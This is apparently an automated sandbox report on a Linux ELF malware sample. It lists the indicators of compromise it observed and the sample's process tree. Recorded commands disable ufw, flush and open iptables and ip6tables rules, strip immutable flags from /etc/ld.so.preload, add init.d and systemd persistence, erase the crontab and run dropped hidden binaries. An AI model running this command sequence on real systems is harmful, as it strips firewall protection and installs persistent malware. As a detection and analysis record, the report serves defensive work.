description ioc Process File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent -
Writes file to system bin folder 1 TTPs 29 IoCs
description ioc Process File opened for modification /bin/crondr cp File opened for modification /bin/sysdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/bprofr cp File opened for modification /bin/sysdr Process not Found File opened for modification /bin/sysdr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/bprofr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/sysdr cp File opened for modification /bin/crondr cp File opened for modification /bin/sysdr cp File opened for modification /bin/bprofr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/initdr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr cp File opened for modification /bin/initdr Process not Found File opened for modification /bin/knlib5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /bin/bprofr cp File opened for modification /bin/bprofr cp -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map service-agent File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency service-agent File opened for reading /sys/fs/cgroup/unified/cgroup.controllers service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets service-agent File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type Process not Found File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type Process not Found File opened for reading /sys/bus/cpu/devices service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus service-agent File opened for reading /sys/devices/virtual/dmi/id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map Process not Found File opened for reading /sys/bus/node/devices/node0/hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/bus/dax/devices service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus service-agent File opened for reading /sys/bus/cpu/devices Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type service-agent File opened for reading /sys/bus/dax/devices/target_node Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level service-agent File opened for reading /sys/bus/cpu/devices service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type service-agent File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition service-agent File opened for reading /sys/bus/dax/devices/target_node service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map Process not Found File opened for reading /sys/bus/dax/devices Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency service-agent File opened for reading /sys/bus/node/devices/node0/meminfo Process not Found File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map service-agent File opened for reading /sys/bus/node/devices/node0/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map service-agent -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/90/status pgrep File opened for reading /proc/904/status Process not Found File opened for reading /proc/458/status pgrep File opened for reading /proc/607/stat ps File opened for reading /proc/1103/status ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/629/status Process not Found File opened for reading /proc/72/status pkill File opened for reading /proc/163/status Process not Found File opened for reading /proc/1115/stat Process not Found File opened for reading /proc/992/status Process not Found File opened for reading /proc/1500/cmdline pgrep File opened for reading /proc/87/status ps File opened for reading /proc/174/stat ps File opened for reading /proc/555/cmdline Process not Found File opened for reading /proc/160/cmdline Process not Found File opened for reading /proc/1447/status Process not Found File opened for reading /proc/78/status Process not Found File opened for reading /proc/1412/status ps File opened for reading /proc/131/status ps File opened for reading /proc/89/cmdline pkill File opened for reading /proc/119/cmdline pkill File opened for reading /proc/88/cmdline Process not Found File opened for reading /proc/473/cmdline Process not Found File opened for reading /proc/970/cmdline Process not Found File opened for reading /proc/486/cmdline ps File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/165/status Process not Found File opened for reading /proc/458/cmdline ps File opened for reading /proc/164/status pkill File opened for reading /proc/959/cmdline Process not Found File opened for reading /proc/789/stat Process not Found File opened for reading /proc/1031/cmdline Process not Found File opened for reading /proc/940/status Process not Found File opened for reading /proc/459/cmdline Process not Found File opened for reading /proc/1102/status ps File opened for reading /proc/497/status ps File opened for reading /proc/89/status Process not Found File opened for reading /proc/800/cmdline Process not Found File opened for reading /proc/5414/stat Process not Found File opened for reading /proc/88/cmdline Process not Found File opened for reading /proc/401/stat ps File opened for reading /proc/1135/stat ps File opened for reading /proc/4075/stat ps File opened for reading /proc/444/status Process not Found File opened for reading /proc/75/status Process not Found File opened for reading /proc/1435/stat ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/273/stat Process not Found File opened for reading /proc/17/status Process not Found File opened for reading /proc/992/cmdline Process not Found File opened for reading /proc/563/status ps File opened for reading /proc/611/cmdline Process not Found File opened for reading /proc/174/status Process not Found File opened for reading /proc/671/status ps File opened for reading /proc/767/status Process not Found File opened for reading /proc/5518/stat Process not Found File opened for reading /proc/891/status pgrep File opened for reading /proc/3610/stat ps File opened for reading /proc/169/cmdline pgrep File opened for reading /proc/1184/status pkill File opened for reading /proc/441/stat ps File opened for reading /proc/14/status Process not Found File opened for reading /proc/563/status Process not Found -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/sys-helper 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/service-agent 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/sys-helper Process not Found File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/service-agent Process not Found File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.lock service-agent File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc sys-helper -
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 37 Go-http-client/1.1 HTTP User-Agent header 53 Go-http-client/1.1 HTTP User-Agent header 66 Go-http-client/1.1
Processes
-
/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
PID:1479 -
/usr/bin/bashbash -c "ufw disable"2⤵PID:1483
-
-
/usr/sbin/ufwufw disable2⤵PID:1483
-
/usr/sbin/iptables/usr/sbin/iptables -V3⤵PID:1493
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1494
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1495
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
PID:1496
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1498
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1502
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1503
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1504
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1505
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1506
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1507
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1508
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1509
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵PID:1510
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1511
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵PID:1512
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1513
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1514
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1515
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1516
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1517
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1518
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1521
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1522
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1523
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1524
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1525
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:1526
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1527
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1528
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1529
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1530
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1531
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1532
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1533
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1534
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1535
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1536
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1537
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1538
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1539
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1540
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1541
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1542
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:1543
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:1544
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1545
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1546
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1548
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1549
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1550
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1551
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1552
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1553
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1554
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1555
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1556
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1557
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1558
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1559
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1560
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1561
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1562
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1563
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1564
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1565
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1566
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1567
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1568
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1569
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1570
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:1571
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1572
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1573
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1574
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1575
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1576
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1577
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1578
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1579
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1580
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1581
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1582
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1583
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1584
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1585
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1586
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1587
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1588
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1589
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1590
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1591
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1592
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:1593
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1594
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1595
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1596
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1597
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1598
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1599
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1600
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1601
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1602
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1603
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1604
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1605
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1606
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1607
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1608
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1609
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1610
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1611
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1612
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1613
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1614
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1615
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1616
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1617
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1618
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1620
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1621
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1623
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1624
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1625
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1626
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1627
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1628
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1629
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1630
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1631
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1632
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1633
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1634
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1635
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1638
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1639
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1640
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1641
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1642
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1643
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1645
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1647
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1649
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1650
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1652
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1653
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1655
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1656
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1658
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1659
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1661
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1663
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1665
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1666
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1667
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1669
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1671
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1672
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1673
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1675
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1677
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1679
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1681
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1682
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1683
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1684
-
-
-
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵PID:1685
-
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT2⤵PID:1685
-
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵PID:1686
-
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵PID:1686
-
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵PID:1687
-
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT2⤵PID:1687
-
-
/usr/bin/bashbash -c "iptables -F"2⤵PID:1690
-
-
/usr/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1690
-
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵PID:1691
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵PID:1691
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads CPU attributes
PID:1693
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:1707
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
- Attempts to change immutable files
PID:1708
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
PID:1709 -
/usr/bin/cpcp -f -r -- /bin/knlib5 /bin/klibsystem53⤵PID:1710
-
-
/usr/bin/rmrm -rf -- klibsystem53⤵PID:1712
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵PID:1713
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
- Reads EFI boot settings
PID:1714
-
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
PID:1928
-
-
/usr/bin/chattrchattr +ia /bin/knlib52⤵PID:1955
-
-
/usr/bin/crontabcrontab -r2⤵PID:1956
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
PID:1957
-
-
/var/tmp/.klibsystem5-x/var/tmp/.klibsystem5-x2⤵
- Executes dropped EXE
PID:2517 -
/usr/bin/bashbash -c "ufw disable"3⤵PID:2521
-
